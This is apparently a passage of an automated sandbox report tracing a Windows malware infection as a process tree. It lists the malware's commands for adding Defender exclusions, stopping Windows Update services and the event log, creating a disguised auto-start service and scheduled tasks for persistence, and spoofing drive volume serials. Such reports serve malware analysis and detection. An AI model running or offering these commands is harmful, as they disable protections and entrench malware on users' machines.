                                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: H34B-PJCG
                                                                      4⤵
                                                                        PID:3672
                                                                        • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                          C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: H34B-PJCG
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          PID:4288
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: G330-303R
                                                                        4⤵
                                                                          PID:4684
                                                                          • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                            C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: G330-303R
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            PID:4736
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: 1DFZ-9OOO
                                                                          4⤵
                                                                            PID:4788
                                                                            • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                              C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: 1DFZ-9OOO
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              PID:2952
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: LLUF-5BU0
                                                                            4⤵
                                                                              PID:4692
                                                                              • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: LLUF-5BU0
                                                                                5⤵
                                                                                • Executes dropped EXE
                                                                                PID:5920
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: UIOO-56CJ
                                                                              4⤵
                                                                                PID:5768
                                                                                • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                  C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: UIOO-56CJ
                                                                                  5⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:5812
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: UT32-TB0M
                                                                                4⤵
                                                                                  PID:736
                                                                                  • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                    C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: UT32-TB0M
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:3272
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: B9VE-FOIN
                                                                                  4⤵
                                                                                    PID:4448
                                                                                    • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                      C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: B9VE-FOIN
                                                                                      5⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:3292
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: 6PCA-G7TR
                                                                                    4⤵
                                                                                      PID:1444
                                                                                      • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                        C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: 6PCA-G7TR
                                                                                        5⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:1956
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: JOEK-HIUG
                                                                                      4⤵
                                                                                        PID:5672
                                                                                        • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                          C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: JOEK-HIUG
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:428
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: S04T-I9BR
                                                                                        4⤵
                                                                                          PID:5060
                                                                                          • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                            C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: S04T-I9BR
                                                                                            5⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:5216
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: OHJ2-VM0B
                                                                                          4⤵
                                                                                            PID:2160
                                                                                            • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                              C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: OHJ2-VM0B
                                                                                              5⤵
                                                                                                PID:5684
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: MO0H-0O95
                                                                                              4⤵
                                                                                                PID:5152
                                                                                                • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                  C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: MO0H-0O95
                                                                                                  5⤵
                                                                                                    PID:5232
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: C556-5M54
                                                                                                  4⤵
                                                                                                    PID:1532
                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      5⤵
                                                                                                        PID:4504
                                                                                                      • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                        C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: C556-5M54
                                                                                                        5⤵
                                                                                                          PID:1324
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: Z0VH-ZJHS
                                                                                                        4⤵
                                                                                                          PID:5620
                                                                                                          • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                            C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: Z0VH-ZJHS
                                                                                                            5⤵
                                                                                                              PID:5588
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: 7ZAU-7CKH
                                                                                                            4⤵
                                                                                                              PID:3928
                                                                                                              • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: 7ZAU-7CKH
                                                                                                                5⤵
                                                                                                                  PID:32
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: EPKJ-3SH3
                                                                                                                4⤵
                                                                                                                  PID:1620
                                                                                                                  • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                    C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: EPKJ-3SH3
                                                                                                                    5⤵
                                                                                                                      PID:4540
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: J5OC-2CP2
                                                                                                                    4⤵
                                                                                                                      PID:1744
                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        5⤵
                                                                                                                          PID:1844
                                                                                                                        • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                          C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: J5OC-2CP2
                                                                                                                          5⤵
                                                                                                                            PID:5556
                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: 0U86-E2HU
                                                                                                                          4⤵
                                                                                                                            PID:5764
                                                                                                                            • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                              C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: 0U86-E2HU
                                                                                                                              5⤵
                                                                                                                                PID:5808
                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: 8SPT-0RJF
                                                                                                                              4⤵
                                                                                                                                PID:3996
                                                                                                                                • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                  C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: 8SPT-0RJF
                                                                                                                                  5⤵
                                                                                                                                    PID:2268
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: 60VE-8CTF
                                                                                                                                  4⤵
                                                                                                                                    PID:4896
                                                                                                                                    • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                      C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: 60VE-8CTF
                                                                                                                                      5⤵
                                                                                                                                        PID:2872
                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: 55KZ-G3N2
                                                                                                                                      4⤵
                                                                                                                                        PID:5392
                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          5⤵
                                                                                                                                            PID:2624
                                                                                                                                          • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                            C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: 55KZ-G3N2
                                                                                                                                            5⤵
                                                                                                                                              PID:5548
                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: CGDK-H4IZ
                                                                                                                                            4⤵
                                                                                                                                              PID:2140
                                                                                                                                              • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                                C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: CGDK-H4IZ
                                                                                                                                                5⤵
                                                                                                                                                  PID:5248
                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg
                                                                                                                                                4⤵
                                                                                                                                                  PID:3636
                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm
                                                                                                                                                  4⤵
                                                                                                                                                    PID:5604
                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe
                                                                                                                                                    4⤵
                                                                                                                                                      PID:5316
                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys
                                                                                                                                                      4⤵
                                                                                                                                                        PID:5600
                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys
                                                                                                                                                        4⤵
                                                                                                                                                          PID:4024
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                                                                                                          4⤵
                                                                                                                                                            PID:2824
                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat
                                                                                                                                                            4⤵
                                                                                                                                                              PID:5144
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe"
                                                                                                                                                            3⤵
                                                                                                                                                            • Checks computer location settings
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                            PID:880
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\.sphyperRuntimedhcpSvc.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\.sphyperRuntimedhcpSvc.exe"
                                                                                                                                                              4⤵
                                                                                                                                                              • Checks computer location settings
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                              • Modifies registry class
                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:3988
                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\PrintHood\System.exe'
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:2980
                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office\Updates\Apply\TextInputHost.exe'
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:2384
                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\MSBuild\Microsoft\csrss.exe'
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:3952
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\Shared Gadgets\backgroundTaskHost.exe'
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:5128
                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\dllhost.exe'
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:5144
                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\QQqUT9RgSw.bat"
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:5576
                                                                                                                                                                            • C:\Windows\system32\chcp.com
                                                                                                                                                                              chcp 65001
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:5224
                                                                                                                                                                              • C:\Windows\system32\w32tm.exe
                                                                                                                                                                                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:2624
                                                                                                                                                                                • C:\Users\All Users\dllhost.exe
                                                                                                                                                                                  "C:\Users\All Users\dllhost.exe"
                                                                                                                                                                                  6⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                  PID:5660
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\conhostsft.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\conhostsft.exe"
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                                            PID:4736
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\.conhostsft.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\.conhostsft.exe"
                                                                                                                                                                              4⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                              PID:1468
                                                                                                                                                                              • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:5640
                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:5372
                                                                                                                                                                                    • C:\Windows\system32\wusa.exe
                                                                                                                                                                                      wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:5296
                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                      C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                      PID:4896
                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                      C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                      PID:5332
                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                      C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                      PID:5604
                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                      C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                      PID:5652
                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                      C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                      PID:5504
                                                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:5644
                                                                                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                                        5⤵
                                                                                                                                                                                          PID:5276
                                                                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:5520
                                                                                                                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                            C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:5452
                                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                                              C:\Windows\system32\sc.exe delete "driverupdate"
                                                                                                                                                                                              5⤵
                                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                                              PID:5228
                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                  PID:4304
                                                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                                                C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                                PID:2120
                                                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                                                C:\Windows\system32\sc.exe stop eventlog
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                                PID:4484
                                                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                                                C:\Windows\system32\sc.exe start "driverupdate"
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                                PID:2084
                                                                                                                                                                                      • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                                                                                                        "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:2896
                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                          schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Users\Default\PrintHood\System.exe'" /f
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                          PID:4064
                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                          schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\Default\PrintHood\System.exe'" /rl HIGHEST /f
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                          PID:512
                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                          schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Users\Default\PrintHood\System.exe'" /rl HIGHEST /f
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                          PID:4664
                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                          schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 13 /tr "'C:\Program Files\Microsoft Office\Updates\Apply\TextInputHost.exe'" /f
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                          PID:4088
                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                          schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\Updates\Apply\TextInputHost.exe'" /rl HIGHEST /f
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                          PID:4940
                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                          schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 7 /tr "'C:\Program Files\Microsoft Office\Updates\Apply\TextInputHost.exe'" /rl HIGHEST /f
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                          PID:4868
                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                          schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\csrss.exe'" /f
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                          PID:3220
                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                          schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\Microsoft\csrss.exe'" /rl HIGHEST /f
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                          PID:448
                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                          schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\csrss.exe'" /rl HIGHEST /f
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                          PID:2260
                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                          schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Sidebar\Shared Gadgets\backgroundTaskHost.exe'" /f
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                          PID:3516
                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                          schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\Shared Gadgets\backgroundTaskHost.exe'" /rl HIGHEST /f
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                          PID:4536
                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                          schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Sidebar\Shared Gadgets\backgroundTaskHost.exe'" /rl HIGHEST /f
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                          PID:1532
                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                          schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\dllhost.exe'" /f
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                          PID:3940
                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                          schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\All Users\dllhost.exe'" /rl HIGHEST /f
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                          PID:944
                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                          schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\dllhost.exe'" /rl HIGHEST /f
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                          PID:5044
                                                                                                                                                                                        • C:\Windows\System32\mousocoreworker.exe
                                                                                                                                                                                          C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:3396
                                                                                                                                                                                          • C:\ProgramData\VC_redist.x64.exe
                                                                                                                                                                                            C:\ProgramData\VC_redist.x64.exe
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                            PID:6112
                                                                                                                                                                                            • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                              PID:2580
                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:5128
                                                                                                                                                                                                • C:\Windows\system32\wusa.exe
                                                                                                                                                                                                  wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:5212
                                                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                                                  C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                                  PID:5264
                                                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                                                  C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                                  PID:1380
                                                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                                                  C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                                  PID:5464
                                                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                                                  C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                                  PID:3600
                                                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                                                  C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                                  PID:5600
                                                                                                                                                                                                • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:5508
                                                                                                                                                                                                  • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                                                    2⤵
